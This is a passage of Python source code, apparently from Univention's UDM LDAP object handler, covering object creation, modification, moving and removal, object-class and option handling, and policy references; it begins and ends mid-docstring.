object contains childrens and *remove_childs* is False.\n :raises: :class:`univention.admin.uexceptions.invalidOperation` if objects of this type do not support to be removed.\n :raises: :class:`univention.admin.uexceptions.noObject` if the object does not exists.\n \"\"\"\n if not univention.admin.modules.supports(self.module, 'remove'):\n raise univention.admin.uexceptions.invalidOperation(_('Objects of the \"%s\" object type can not be removed.') % (self.module,))\n\n if not self.dn or not self.lo.get(self.dn):\n raise univention.admin.uexceptions.noObject(self.dn)\n\n if self.lo.compare_dn(self.dn, self.lo.whoami()):\n raise univention.admin.uexceptions.invalidOperation(_('The own object cannot be removed.'))\n\n return self._remove(remove_childs)\n\n def get_gid_for_primary_group(self): # type: () -> str\n \"\"\"\n Return the numerical group ID of the primary group.\n\n :returns: The numerical group ID as a string or \"99999\" if no primary group is declared.\n :rtype: str\n :raises univention.admin.uexceptions.primaryGroup: if the object has no primary group.\n \"\"\"\n gidNum = u'99999'\n if self['primaryGroup']:\n try:\n gidNum = self.lo.getAttr(self['primaryGroup'], 'gidNumber', required=True)[0].decode('ASCII')\n except ldap.NO_SUCH_OBJECT:\n raise univention.admin.uexceptions.primaryGroup(self['primaryGroup'])\n return gidNum\n\n def get_sid_for_primary_group(self): # type: () -> str\n \"\"\"\n Return the Windows security ID for the primary group.\n\n :returns: The security identifier of the primary group.\n :rtype: str\n :raises univention.admin.uexceptions.primaryGroup: if the object has no primary group.\n \"\"\"\n try:\n sidNum = self.lo.getAttr(self['primaryGroup'], 'sambaSID', required=True)[0].decode('ASCII')\n except ldap.NO_SUCH_OBJECT:\n raise univention.admin.uexceptions.primaryGroupWithoutSamba(self['primaryGroup'])\n return sidNum\n\n def _ldap_pre_ready(self): # type: () -> None\n \"\"\"Hook which is called before 
:func:`univention.admin.handlers.simpleLdap.ready`.\"\"\"\n\n def _ldap_pre_create(self): # type: () -> None\n \"\"\"Hook which is called before the object creation.\"\"\"\n self.dn = self._ldap_dn()\n self.request_lock('cn-uid-position', self.dn)\n\n def _ldap_dn(self): # type: () -> Text\n \"\"\"\n Builds the LDAP DN of the object before creation by using the identifying properties to build the RDN.\n\n :returns: the distringuised name.\n :rtype: str\n \"\"\"\n identifier = [\n (self.mapping.mapName(name), self.mapping.mapValueDecoded(name, self.info[name]), 2)\n for name, prop in self.descriptions.items()\n if prop.identifies\n ]\n return u'%s,%s' % (dn2str([identifier]), dn2str(str2dn(self.dn)[1:]) if self.exists() else self.position.getDn())\n\n def _ldap_post_create(self): # type: () -> None\n \"\"\"Hook which is called after the object creation.\"\"\"\n self._confirm_locks()\n\n def _ldap_pre_modify(self): # type: () -> None\n \"\"\"Hook which is called before the object modification.\"\"\"\n\n def _ldap_post_modify(self): # type: () -> None\n \"\"\"Hook which is called after the object modification.\"\"\"\n self._confirm_locks()\n\n def _ldap_pre_rename(self, newdn): # type: (str) -> None\n \"\"\"\n Hook which is called before renaming the object.\n\n :param str newdn: The new distiguished name the object will be renamed to.\n \"\"\"\n self.request_lock('cn-uid-position', newdn)\n\n def _ldap_post_rename(self, olddn): # type: (str) -> None\n \"\"\"\n Hook which is called after renaming the object.\n\n :param str olddn: The old distiguished name the object was renamed from.\n \"\"\"\n\n def _ldap_pre_move(self, newdn): # type: (str) -> None\n \"\"\"\n Hook which is called before the object moving.\n\n :param str newdn: The new distiguished name the object will be moved to.\n \"\"\"\n self.request_lock('cn-uid-position', newdn)\n\n def _ldap_post_move(self, olddn): # type: (str) -> None\n \"\"\"\n Hook which is called after the object moving.\n\n :param str 
olddn: The old distiguished name the object was moved from.\n \"\"\"\n\n def _ldap_pre_remove(self): # type: () -> None\n \"\"\"Hook which is called before the object removal.\"\"\"\n\n def _ldap_post_remove(self): # type: () -> None\n \"\"\"Hook which is called after the object removal.\"\"\"\n self._release_locks()\n\n def _safe_cancel(self): # type: () -> None\n try:\n self.cancel()\n except (KeyboardInterrupt, SystemExit, SyntaxError):\n raise\n except Exception:\n ud.debug(ud.ADMIN, ud.ERROR, \"cancel() failed: %s\" % (traceback.format_exc(),))\n\n def _falsy_boolean_extended_attributes(self, info): # type: (_Properties) -> _Properties\n m = univention.admin.modules.get(self.module)\n for prop in getattr(m, 'extended_udm_attributes', []):\n if prop.syntax == 'boolean' and not info.get(prop.name):\n info[prop.name] = u'0'\n return info\n\n def exists(self): # type: () -> bool\n \"\"\"\n Indicates that this object exists in LDAP.\n\n :returns: True if the object exists in LDAP, False otherwise.\n :rtype: bool\n \"\"\"\n return self._exists\n\n def _validate_superordinate(self, must_exists=True): # type: (bool) -> None\n \"\"\"\n Checks if the superordinate is set to a valid :class:`univention.admin.handlers.simpleLdap` object if this module requires a superordinate.\n It is ensured that the object type of the superordinate is correct.\n It is ensured that the object lies underneath of the superordinate position.\n\n :raises: :class:`univention.admin.uexceptions.insufficientInformation`\n\n :raises: :class:`univention.admin.uexceptions.noSuperordinate`\n \"\"\"\n superordinate_names = set(univention.admin.modules.superordinate_names(self.module))\n if not superordinate_names:\n return # module has no superodinates\n\n if not self.dn and not self.position:\n # this check existed in all modules with superordinates, so still check it here, too\n raise univention.admin.uexceptions.insufficientInformation(_('Neither DN nor position given.'))\n\n if not 
self.superordinate:\n self.superordinate = univention.admin.objects.get_superordinate(self.module, None, self.lo, self.dn or self.position.getDn())\n\n if not self.superordinate:\n if superordinate_names == {'settings/cn'}:\n ud.debug(ud.ADMIN, ud.WARN, 'No settings/cn superordinate was given.')\n return # settings/cn might be misued as superordinate, don't risk currently\n if not must_exists:\n return\n raise univention.admin.uexceptions.noSuperordinate(_('No superordinate object given'))\n\n # check if the superordinate is of the correct object type\n if not {self.superordinate.module} & superordinate_names:\n raise univention.admin.uexceptions.insufficientInformation(_('The given %r superordinate is expected to be of type %s.') % (self.superordinate.module, ', '.join(superordinate_names)))\n\n if self.dn and not self._ensure_dn_in_subtree(self.superordinate.dn, self.lo.parentDn(self.dn)):\n raise univention.admin.uexceptions.insufficientInformation(_('The DN must be underneath of the superordinate.'))\n\n def _ensure_dn_in_subtree(self, parent, dn): # type: (Text, Text) -> bool\n \"\"\"\n Checks if the given DN is underneath of the subtree of the given parent DN.\n\n :param str parent: The distiguished name of the parent container.\n :param str dn: The distinguished name to check.\n :returns: True if `dn` is underneath of `parent`, False otherwise.\n :rtype: bool\n \"\"\"\n while dn:\n if self.lo.compare_dn(dn, parent):\n return True\n dn = self.lo.parentDn(dn)\n return False\n\n def call_udm_property_hook(self, hookname, module, changes=None): # types: (Text, Text, Dict[str, Tuple]) -> Dict[str, Tuple]\n \"\"\"\n Internal method to call a hook scripts of extended attributes.\n\n :param str hookname: The name of the hook function to call.\n :param str module: The name of the UDM module.\n :param dict changes: A list of changes.\n :returns: The (modified) list of changes.\n :rtype: dict or None\n \"\"\"\n m = univention.admin.modules.get(module.module)\n if 
hasattr(m, 'extended_udm_attributes'):\n for prop in m.extended_udm_attributes:\n if prop.hook is not None:\n func = getattr(prop.hook, hookname, None)\n if changes is None:\n func(module)\n else:\n changes = func(module, changes)\n return changes\n\n def open(self): # type: () -> None\n \"\"\"\n Opens this object.\n\n During the initialization of this object the current set LDAP attributes are mapped into :py:attr:`info`.\n This method makes it possible to e.g. resolve external references to other objects which are not represented in the raw LDAP attributes\n of this object, for example the group memberships of a user.\n\n By default only the `open` hook for extended attributes is called.\n This method can be subclassed.\n\n .. warning::\n If this method changes anything in self.info it *must* call :py:meth:`save` afterwards.\n\n .. warning::\n If your are going to do any modifications (such as creating, modifying, moving, removing this object)\n this method must be called directly after the constructor and before modifying any property.\n \"\"\"\n self._open = True\n self.call_udm_property_hook('hook_open', self)\n self.save()\n\n def _remove_option(self, name): # type: (str) -> None\n \"\"\"\n Removes the UDM option if it is set.\n\n :param str name: The name of the option to remove.\n \"\"\"\n if name in self.options:\n self.options.remove(name)\n\n def __set_options(self): # type: () -> None\n \"\"\"Enables the UDM options of this object by evaluating the currently set LDAP object classes. 
If the object does not exists yet the default options are enabled.\"\"\"\n options = univention.admin.modules.options(self.module)\n if 'objectClass' in self.oldattr:\n ocs = {x.decode('UTF-8') for x in self.oldattr['objectClass']}\n self.options = [\n opt\n for opt, option in options.items()\n if not option.disabled and option.matches(ocs) and self.__app_option_enabled(opt, option)\n ]\n else:\n ud.debug(ud.ADMIN, ud.INFO, 'reset options to default by _define_options')\n self.options = []\n self._define_options(options)\n\n def _define_options(self, module_options):\n # type: (Dict[str, Any]) -> None\n \"\"\"\n Enables all UDM options which are enabled by default.\n\n :param dict module_options: A mapping of option-name to option.\n \"\"\"\n ud.debug(ud.ADMIN, ud.INFO, 'modules/__init__.py _define_options: reset to default options')\n self.options.extend(\n name\n for name, opt in module_options.items()\n if not opt.disabled and opt.default\n )\n\n def option_toggled(self, option): # type: (str) -> bool\n \"\"\"\n Checks if an UDM option was changed.\n\n :param str option: The name of the option to check.\n :returns: True if the option was changed, False otherwise.\n :rtype: bool\n\n .. 
warning::\n This does not work for not yet existing objects.\n \"\"\"\n return option in set(self.options) ^ set(self.old_options)\n\n def policy_reference(self, *policies):\n for policy in policies:\n if not ldap.dn.is_dn(policy):\n raise univention.admin.uexceptions.valueInvalidSyntax(policy)\n try:\n if b'univentionPolicy' not in self.lo.getAttr(policy, 'objectClass', required=True):\n raise univention.admin.uexceptions.valueError('Object is not a policy', policy)\n except ldap.NO_SUCH_OBJECT:\n raise univention.admin.uexceptions.noObject('Policy does not exists', policy)\n self.policies.extend(policy for policy in policies if not any(self.lo.compare_dn(pol, policy) for pol in self.policies))\n\n def policy_dereference(self, *policies):\n for policy in policies:\n if not ldap.dn.is_dn(policy):\n raise univention.admin.uexceptions.valueInvalidSyntax(policy)\n self.policies = [policy for policy in self.policies if not any(self.lo.compare_dn(pol, policy) for pol in policies)]\n\n def policiesChanged(self):\n # type: () -> bool\n return set(self.oldpolicies) != set(self.policies)\n\n def __app_option_enabled(self, name, option):\n if option.is_app_option:\n return all(self[pname] in ('TRUE', '1', 'OK') for pname, prop in self.descriptions.items() if name in prop.options and prop.syntax.name in ('AppActivatedBoolean', 'AppActivatedTrue', 'AppActivatedOK'))\n return True\n\n def description(self): # type: () -> str\n \"\"\"\n Return a descriptive string for the object.\n By default the relative distinguished name is returned.\n\n :returns: A descriptive string or `none` as fallback.\n :rtype: str\n \"\"\"\n if self.dn:\n return u'+'.join(explode_rdn(self.dn, 1))\n else:\n for name, property in self.descriptions.items():\n if property.identifies:\n syntax = property.syntax\n return syntax.tostring(self[name])\n return u'none'\n\n def _post_unmap(self, info, values):\n \"\"\"\n This method can be overwritten to define special un-map methods to map\n back from LDAP to 
UDM that can not be done with the default mapping API.\n\n :param info: The list of UDM properties.\n :param values: The list of LDAP attributes.\n :returns: The (modified) list of UDM properties.\n :rtype:\n \"\"\"\n return info\n\n def _post_map(self, modlist, diff):\n \"\"\"\n This method can be overwritten to define special map methods to map from\n UDM to LDAP that can not be done with the default mapping API.\n\n :param modlist: The list of LDAP modifications.\n :param list diff: A list of modified UDM properties.\n :returns: The (modified) list of LDAP modifications.\n :rtype:\n \"\"\"\n return modlist\n\n def _ldap_addlist(self): # type: () -> List[Tuple[Text, Any]]\n return []\n\n def _ldap_modlist(self):\n \"\"\"\n Builds the list of modifications when creating and modifying this object.\n\n It compares the old properties (:py:attr:`oldinfo`) with the new properties (:py:attr:`info`) and applies the LDAP mapping.\n Differences are added to the modlist which consists of a tuple with three items:\n\n (\"LDAP attribute-name\", [old, values], [new, values])\n\n (\"LDAP attribute-name\", old_value, new_value)\n\n (\"LDAP attribute-name\", None, added_value)\n\n .. seealso:: :mod:`univention.uldap` for further information about the format of the modlist.\n\n This method can be overridden in a subclass to add special behavior, e.g. for properties which have no mapping defined.\n\n .. 
caution:: The final modlist used for creation of objects is mixed with the :func:`univention.admin.handlers.simpleLdap._ldap_addlist`.\n Make sure this method don't add attributes which are already set.\n\n :rtype: list of tuples\n \"\"\"\n diff_ml = self.diff()\n ml = univention.admin.mapping.mapDiff(self.mapping, diff_ml)\n ml = self._post_map(ml, diff_ml)\n\n if self.policiesChanged():\n policy_ocs_set = b'univentionPolicyReference' in self.oldattr.get('objectClass', [])\n if self.policies and not policy_ocs_set:\n ml.append(('objectClass', b'', [b'univentionPolicyReference']))\n elif not self.policies and policy_ocs_set:\n ml.append(('objectClass', b'univentionPolicyReference', b''))\n ml.append(('univentionPolicyReference', [x.encode('UTF-8') for x in self.oldpolicies], [x.encode('UTF-8') for x in self.policies]))\n\n return ml\n\n def _create(self, response=None, serverctrls=None):\n \"\"\"Create the object. Should only be called by :func:`univention.admin.handlers.simpleLdap.create`.\"\"\"\n self._ldap_pre_create()\n self._update_policies()\n self.call_udm_property_hook('hook_ldap_pre_create', self)\n\n self.set_default_values()\n\n # iterate over all properties and call checkLdap() of corresponding syntax\n self._call_checkLdap_on_all_property_syntaxes()\n\n al = self._ldap_addlist()\n al.extend(self._ldap_modlist())\n al = self._ldap_object_classes_add(al)\n al = self.call_udm_property_hook('hook_ldap_addlist', self, al)\n\n # ensure univentionObject is set\n al.append(('objectClass', [b'univentionObject']))\n al.append(('univentionObjectType', [self.module.encode('utf-8')]))\n\n ud.debug(ud.ADMIN, ud.INFO, \"create object with dn: %s\" % (self.dn,))\n ud.debug(ud.ADMIN, 99, 'Create dn=%r;\\naddlist=%r;' % (self.dn, al))\n\n # if anything goes wrong we need to remove the already created object, otherwise we run into 'already exists' errors\n try:\n self.lo.add(self.dn, al, serverctrls=serverctrls, response=response)\n self._exists = True\n 
self._ldap_post_create()\n except Exception:\n # ensure that there is no lock left\n exc = sys.exc_info()\n ud.debug(ud.ADMIN, ud.PROCESS, \"Creating %r failed: %r\" % (self.dn, exc[1]))\n try:\n self.cancel()\n except Exception:\n ud.debug(ud.ADMIN, ud.ERROR, \"Post-create: cancel() failed: %s\" % (traceback.format_exc(),))\n try:\n if self._exists: # add succeeded but _ldap_post_create failed!\n obj = univention.admin.objects.get(univention.admin.modules.get(self.module), None, self.lo, self.position, self.dn)\n obj.open()\n obj.remove()\n except Exception:\n ud.debug(ud.ADMIN, ud.ERROR, \"Post-create: remove() failed: %s\" % (traceback.format_exc(),))\n six.reraise(exc[0], exc[1], exc[2])\n\n self.call_udm_property_hook('hook_ldap_post_create', self)\n\n self.save()\n return self.dn\n\n def _ldap_object_classes_add(self, al):\n m = univention.admin.modules.get(self.module)\n # evaluate extended attributes\n ocs = set() # type: Set[str]\n for prop in getattr(m, 'extended_udm_attributes', []):\n ud.debug(ud.ADMIN, ud.INFO, 'simpleLdap._create: info[%s]:%r = %r' % (prop.name, self.has_property(prop.name), self.info.get(prop.name)))\n if prop.syntax == 'boolean' and self.info.get(prop.name) == u'0':\n continue\n if self.has_property(prop.name) and self.info.get(prop.name):\n ocs.add(prop.objClass)\n\n module_options = univention.admin.modules.options(self.module)\n # add object classes of (especially extended) options\n for option in ['default'] + self.options:\n try:\n opt = module_options[option]\n except KeyError:\n ud.debug(ud.ADMIN, ud.INFO, '%r does not specify option %r' % (m.module, option))\n continue\n ocs |= set(opt.objectClasses)\n\n # remove duplicated object classes\n for i in al:\n key, val = i[0], i[-1] # might be a triple\n if val and key.lower() == 'objectclass':\n val_list = [val] if not isinstance(val, (tuple, list)) else val\n val_unicode = [x.decode('UTF-8') if isinstance(x, bytes) else x for x in val_list]\n ocs -= set(val_unicode) # TODO: 
check six.string_types vs bytes everywhere for ocs calculations\n if ocs:\n al.append(('objectClass', [x.encode('UTF-8') for x in ocs]))\n\n return al\n\n def _modify(self, modify_childs=True, ignore_license=False, response=None, serverctrls=None):\n \"\"\"Modify the object. Should only be called by :func:`univention.admin.handlers.simpleLdap.modify`.\"\"\"\n self.__prevent_ad_property_change()\n\n self._ldap_pre_modify()\n self._update_policies()\n self.call_udm_property_hook('hook_ldap_pre_modify', self)\n\n self.set_default_values()\n self._fix_app_options()\n\n # iterate over all properties and call checkLdap() of corresponding syntax\n self._call_checkLdap_on_all_property_syntaxes()\n\n ml = self._ldap_modlist()\n ml = self.call_udm_property_hook('hook_ldap_modlist', self, ml)\n ml = self._ldap_object_classes(ml)\n\n class wouldRename(Exception):\n @classmethod\n def on_rename(cls, dn, new_dn, ml):\n raise cls(dn, new_dn)\n\n # FIXME: timeout without exception if objectClass of Object is not exsistant !!\n ud.debug(ud.ADMIN, 99, 'Modify dn=%r;\\nmodlist=%r;\\noldattr=%r;' % (self.dn, ml, self.oldattr))\n try:\n self.dn = self.lo.modify(self.dn, ml, ignore_license=ignore_license, serverctrls=serverctrls, response=response, rename_callback=wouldRename.on_rename)\n except wouldRename as exc:\n self._ldap_pre_rename(exc.args[1])\n self.dn = self.lo.modify(self.dn, ml, ignore_license=ignore_license, serverctrls=serverctrls, response=response)\n self._ldap_post_rename(exc.args[0])\n if ml:\n self._write_admin_diary_modify()\n\n self._ldap_post_modify()\n self.call_udm_property_hook('hook_ldap_post_modify', self)\n\n self.save()\n return self.dn\n\n def set_default_values(self): # type: () -> None\n \"\"\"Sets all the default values of all properties.\"\"\"\n # Make sure all default values are set...\n for name, p in self.descriptions.items():\n # ... 
if property has no option or any required option is currently enabled\n if not self.has_property(name):\n continue\n set_defaults = self.set_defaults\n if not self.set_defaults and p.options and not set(self.old_options) & set(p.options):\n # set default values of properties which depend on an option but weren't activated prior modifying\n self.set_defaults = True\n try:\n if p.default(self):\n self[name] # __getitem__ sets default value\n finally:\n self.set_defaults = set_defaults\n\n def _fix_app_options(self): # type: () -> None\n # for objects with objectClass=appObject and appObjectActivated=0 we must set appObjectActivated=1\n for option, opt in getattr(univention.admin.modules.get(self.module), 'options', {}).items():\n if not opt.is_app_option or not self.option_toggled(option) or option not in self.options:\n continue\n for pname, prop in self.descriptions.items():\n if option in prop.options and prop.syntax.name in ('AppActivatedBoolean', 'AppActivatedTrue', 'AppActivatedOK'):\n self[pname] = True\n\n def _ldap_object_classes(self, ml): # type: (list) -> list\n \"\"\"Detects the attributes changed in the given modlist, calculates the changes of the object class and appends it to the modlist.\"\"\"\n m = univention.admin.modules.get(self.module)\n\n def lowerset(vals):\n # type: (Iterable[str]) -> Set[str]\n return {x.lower() for x in vals}\n\n ocs = lowerset(x.decode('UTF-8') for x in _MergedAttributes(self, ml).get_attribute('objectClass'))\n unneeded_ocs = set() # type: Set[Text]\n required_ocs = set() # type: Set[Text]\n\n # evaluate (extended) options\n module_options = univention.admin.modules.options(self.module)\n available_options = set(module_options)\n options = set(self.options)\n if 'default' in available_options:\n options |= {'default'}\n old_options = set(self.old_options)\n if options != old_options:\n ud.debug(ud.ADMIN, ud.INFO, 'options=%r; old_options=%r' % (options, old_options))\n unavailable_options = (options - available_options) | 
(old_options - available_options)\n if unavailable_options:\n # Bug #46586: as we simulate legacy options, this is no longer an error\n ud.debug(ud.ADMIN, ud.INFO, '%r does not provide options: %r' % (self.module, unavailable_options))\n added_options = options - old_options - unavailable_options\n removed_options = old_options - options - unavailable_options\n\n # evaluate extended attributes\n for prop in getattr(m, 'extended_udm_attributes', []):\n ud.debug(ud.ADMIN, ud.INFO, 'simpleLdap._modify: extended attribute=%r oc=%r' % (prop.name, prop.objClass))\n\n if self.has_property(prop.name) and self.info.get(prop.name) and (True if prop.syntax != 'boolean' else self.info.get(prop.name) != '0'):\n required_ocs |= {prop.objClass}\n continue\n\n if prop.deleteObjClass:\n unneeded_ocs |= {prop.objClass}\n\n # if the value is unset we need to remove the attribute completely\n if self.oldattr.get(prop.ldapMapping):\n ml = [x for x in ml if x[0].lower() != prop.ldapMapping.lower()]\n ml.append((prop.ldapMapping, self.oldattr.get(prop.ldapMapping), b''))\n\n unneeded_ocs |= {oc for option in removed_options for oc in module_options[option].objectClasses}\n required_ocs |= {oc for option in added_options for oc in module_options[option].objectClasses}\n\n ocs -= lowerset(unneeded_ocs)\n ocs |= lowerset(required_ocs)\n if lowerset(x.decode('utf-8') for x in self.oldattr.get('objectClass', [])) == ocs:\n return ml\n\n ud.debug(ud.ADMIN, ud.INFO, 'OCS=%r; required=%r; removed: %r' % (ocs, required_ocs, unneeded_ocs))\n\n # case normalize object class names\n schema = self.lo.get_schema()\n ocs = {x.names[0] for x in (schema.get_obj(ldap.schema.models.ObjectClass, x) for x in ocs) if x}\n\n # make sure we still have a structural object class\n if not schema.get_structural_oc(ocs):\n structural_ocs = schema.get_structural_oc(unneeded_ocs)\n if not structural_ocs:\n ud.debug(ud.ADMIN, ud.ERROR, 'missing structural object class. 
Modify will fail.')\n return ml\n ud.debug(ud.ADMIN, ud.WARN, 'Preventing to remove last structural object class %r' % (structural_ocs,))\n ocs -= set(schema.get_obj(ldap.schema.models.ObjectClass, structural_ocs).names)\n\n # validate removal of object classes\n must, may = schema.attribute_types(ocs)\n allowed = {name.lower() for attr in may.values() for name in attr.names} | {name.lower() for attr in must.values() for name in attr.names}\n\n ml = [x for x in ml if x[0].lower() != 'objectclass']\n ml.append(('objectClass', self.oldattr.get('objectClass', []), [x.encode('utf-8') for x in ocs]))\n newattr = ldap.cidict.cidict(_MergedAttributes(self, ml).get_attributes())\n\n # make sure only attributes known by the object classes are set\n for attr, val in newattr.items():\n if not val:\n continue\n if re.sub(u';binary$', u'', attr.lower()) not in allowed:\n ud.debug(ud.ADMIN, ud.WARN, 'The attribute %r is not allowed by any object class.' % (attr,))\n # ml.append((attr, val, [])) # TODO: Remove the now invalid attribute instead\n return ml\n\n # require all MUST attributes to be set\n for attr in must.values():\n if not any(newattr.get(name) or newattr.get(u'%s;binary' % (name,)) for name in attr.names):\n ud.debug(ud.ADMIN, ud.WARN, 'The attribute %r is required by the current object classes.' 
% (attr.names,))\n return ml\n\n ml = [x for x in ml if x[0].lower() != 'objectclass']\n ml.append(('objectClass', self.oldattr.get('objectClass', []), [x.encode('utf-8') for x in ocs]))\n\n return ml\n\n def _move_in_subordinates(self, olddn):\n result = self.lo.searchDn(base=self.lo.base, filter=filter_format(u'(&(objectclass=person)(secretary=%s))', [olddn]))\n for subordinate in result:\n self.lo.modify(subordinate, [('secretary', olddn.encode('utf-8'), self.dn.encode('utf-8'))])\n\n def _move_in_groups(self, olddn):\n for group in self.oldinfo.get('groups', []) + [self.oldinfo.get('machineAccountGroup', '')]:\n if group != '':\n try:\n self.lo.modify(\n group, [('uniqueMember', [olddn.encode(\"UTF-8\")], None)])\n except univention.admin.uexceptions.ldapError as exc:\n if not isinstance(exc.original_exception, ldap.NO_SUCH_ATTRIBUTE):\n raise\n try:\n self.lo.modify(group, [('uniqueMember', None, [self.dn.encode(\"UTF-8\")])])\n except univention.admin.uexceptions.ldapError as exc:\n if not isinstance(exc.original_exception, ldap.TYPE_OR_VALUE_EXISTS):\n raise\n\n def _move(self, newdn, modify_childs=True, ignore_license=False): # type: (str, bool, bool) -> str\n \"\"\"Moves this object to the new DN. 
Should only be called by :func:`univention.admin.handlers.simpleLdap.move`.\"\"\"\n self._ldap_pre_move(newdn)\n\n olddn = self.dn\n self.lo.rename(self.dn, newdn)\n self.dn = newdn\n\n try:\n self._move_in_groups(olddn) # can be done always, will do nothing if oldinfo has no attribute 'groups'\n self._move_in_subordinates(olddn)\n self._ldap_post_move(olddn)\n except Exception:\n # move back\n ud.debug(ud.ADMIN, ud.WARN, 'simpleLdap._move: self._ldap_post_move failed, move object back to %s' % olddn)\n self.lo.rename(self.dn, olddn)\n self.dn = olddn\n raise\n self._write_admin_diary_move(newdn)\n return self.dn\n\n def _write_admin_diary_move(self, position):\n self._write_admin_diary_event('MOVED', {'position': position})\n\n def _remove(self, remove_childs=False): # type: (bool) -> None\n \"\"\"Removes this object. Should only be called by :func:`univention.admin.handlers.simpleLdap.remove`.\"\"\"\n ud.debug(ud.ADMIN, ud.INFO, 'handlers/__init__._remove() called for %r with remove_childs=%r' % (self.dn, remove_childs))\n\n if _prevent_to_change_ad_properties and self._is_synced_object():\n raise univention.admin.uexceptions.invalidOperation(_('Objects from Active Directory can not be removed.'))\n\n self._ldap_pre_remove()\n self.call_udm_property_hook('hook_ldap_pre_remove', self)\n\n if remove_childs:\n subelements = [] # type: List[Tuple[str, Dict[str, List[str]]]]\n if b'FALSE' not in self.lo.getAttr(self.dn, 'hasSubordinates'):\n ud.debug(ud.ADMIN, ud.INFO, 'handlers/__init__._remove() children of base dn %s' % (self.dn,))\n subelements = self.lo.search(base=self.dn, scope='one', attr=[])\n\n for subolddn, suboldattrs in subelements:\n ud.debug(ud.ADMIN, ud.INFO, 'remove: subelement %s' % (subolddn,))\n for submodule in univention.admin.modules.identify(subolddn, suboldattrs):\n subobject = submodule.object(None, self.lo, None, dn=subolddn, attributes=suboldattrs)\n subobject.open()\n try:\n subobject.remove(remove_childs)\n except 
univention.admin.uexceptions.base as exc:\n ud.debug(ud.ADMIN, ud.ERROR, 'remove: could not remove %r: %s: %s' % (subolddn, type(exc).__name__, exc))\n break\n else:\n ud.debug(ud.ADMIN, ud.WARN, 'remove: could not identify UDM module of %r' % (subolddn,))\n\n self.lo.delete(self.dn)\n self._exists = False\n\n self._ldap_post_remove()\n\n self.call_udm_property_hook('hook_ldap_post_remove', self)\n self.oldattr = {}\n self._write_admin_diary_remove()\n self.save()\n\n def _write_admin_diary_remove(self):\n # type: () -> None\n self._write_admin_diary_event('REMOVED')\n\n def loadPolicyObject(self, policy_type, reset=0): # type: (str, int) -> simplePolicy\n pathlist = []\n\n ud.debug(ud.ADMIN, ud.INFO, \"loadPolicyObject: policy_type: %s\" % policy_type)\n policy_module = univention.admin.modules.get(policy_type)\n\n # overwrite property descriptions\n univention.admin.ucr_overwrite_properties(policy_module, self.lo)\n # re-build layout if there any overwrites defined\n univention.admin.ucr_overwrite_module_layout(policy_module)\n\n # retrieve path info from 'cn=directory,cn=univention,' object\n pathResult = self.lo.get('cn=directory,cn=univention,' + self.position.getDomain())\n if not pathResult:\n pathResult = self.lo.get('cn=default containers,cn=univention,' + self.position.getDomain())\n for i in pathResult.get('univentionPolicyObject', []):\n i = i.decode('utf-8')\n try:\n self.lo.searchDn(base=i, scope='base')\n pathlist.append(i)\n ud.debug(ud.ADMIN, ud.INFO, \"loadPolicyObject: added path %s\" % i)\n except Exception:\n ud.debug(ud.ADMIN, ud.INFO, \"loadPolicyObject: invalid path setting: %s does not exist in LDAP\" % i)\n continue # looking for next policy container\n break # at least one item has been found; so we can stop here since only pathlist[0] is used\n\n if not pathlist:\n policy_position = self.position\n else:\n policy_position = univention.admin.uldap.position(self.position.getBase())\n policy_path = pathlist[0]\n try:\n prefix = 
univention.admin.modules.policyPositionDnPrefix(policy_module)\n self.lo.searchDn(base=u\"%s,%s\" % (prefix, policy_path), scope='base')\n policy_position.setDn(u\"%s,%s\" % (prefix, policy_path))\n except Exception:\n policy_position.setDn(policy_path)\n\n for dn in self.policies:\n if univention.admin.modules.recognize(policy_module, dn, self.lo.get(dn)) and self.policyObjects.get(policy_type, None) and self.policyObjects[policy_type].cloned == dn and not reset:\n return self.policyObjects[policy_type]\n\n for dn in self.policies:\n modules = univention.admin.modules.identify(dn, self.lo.get(dn))\n for module in modules:\n if univention.admin.modules.name(module) == policy_type:\n self.policyObjects[policy_type] = univention.admin.objects.get(module, None, self.lo, policy_position, dn=dn)\n self.policyObjects[policy_type].clone(self)\n self._init_ldap_search(self.policyObjects[policy_type])\n\n return self.policyObjects[policy_type]\n if not modules:\n self.policies.remove(dn)\n\n if not self.policyObjects.get(policy_type, None) or reset:\n self.policyObjects[policy_type] = univention.admin.objects.get(policy_module, None, self.lo, policy_position)\n self.policyObjects[policy_type].copyIdentifier(self)\n self._init_ldap_search(self.policyObjects[policy_type])\n\n return self.policyObjects[policy_type]\n\n def _init_ldap_search(self, policy): # type: (simplePolicy) -> None\n properties = {} # type: Dict[str, univention.admin.property]\n if hasattr(policy, 'property_descriptions'):\n properties = policy.property_descriptions\n elif hasattr(policy, 'descriptions'):\n properties = policy.descriptions\n for pname, prop in properties.items():\n if prop.syntax.name == 'LDAP_Search':\n prop.syntax._load(self.lo)\n if prop.syntax.viewonly:\n policy.mapping.unregister(pname, False)\n\n def _update_policies(self): # type: () -> None\n for policy_type, policy_object in self.policyObjects.items():\n ud.debug(ud.ADMIN, ud.INFO, \"simpleLdap._update_policies: processing policy 
of type: %s\" % policy_type)\n if policy_object.changes:\n ud.debug(ud.ADMIN, ud.INFO, \"simpleLdap._update_policies: trying to create policy of type: %s\" % policy_type)\n ud.debug(ud.ADMIN, ud.INFO, \"simpleLdap._update_policies: policy_object.info=%s\" % policy_object.info)\n policy_object.create()\n univention.admin.objects.replacePolicyReference(self, policy_type, policy_object.dn)\n\n def closePolicyObjects(self): # type: () -> None\n self.policyObjects = {}\n\n def savePolicyObjects(self): # type: () -> None\n self._update_policies()\n self.closePolicyObjects()\n\n def cancel(self): # type: () -> None\n \"\"\"Cancels the object creation or modification. This method can be subclassed to revert changes for example releasing locks.\"\"\"\n self._release_locks()\n\n def _release_locks(self, name=None): # type: (Optional[str]) -> None\n \"\"\"Release all temporary done locks\"\"\"\n for lock in self.alloc[:]:\n key, value = lock[0:2]\n if name and key != name:\n continue\n self.alloc.remove(lock)\n ud.debug(ud.ADMIN, ud.INFO, 'release_lock(%s): %r' % (key, value))\n univention.admin.allocators.release(self.lo, self.position, key, value)\n\n def _confirm_locks(self): # type: () -> None\n \"\"\"\n Confirm all temporary done locks. 
